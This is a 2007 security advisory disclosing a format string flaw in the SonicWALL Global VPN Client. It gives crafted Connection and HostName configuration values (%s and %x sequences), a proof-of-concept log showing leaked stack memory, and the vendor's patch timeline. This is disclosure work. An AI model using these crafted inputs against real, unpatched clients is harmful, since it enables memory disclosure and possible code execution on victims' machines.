SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
                  title: SonicWALL Global VPN Client Format String Vulnerability
                program: SonicWALL Global VPN Client
     vulnerable version: < 4.0.0.830
               homepage: www.sonicwall.com
                  found: 06-12-2007
                     by: lofi42*
             perm. link: http://www.sec-consult.com/305.html
=====================================================================================

Vendor description:
---------------

The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.


Vulnerabilty overview:
---------------

SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.


Vulnerability details:
--------------- 

Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "Hostname" Tags in the configuration file.

Examples:

<Connection name=%s%s%s%s> 
<HostName>%s%s%s%s</HostName>

The bugs has been verified in version 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version beta 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log.


Proof-of-concept:
--------------- 

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------


vendor status:
---------------
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26

The issue has been fixed in SonicWall VPN client 4.0.0.830.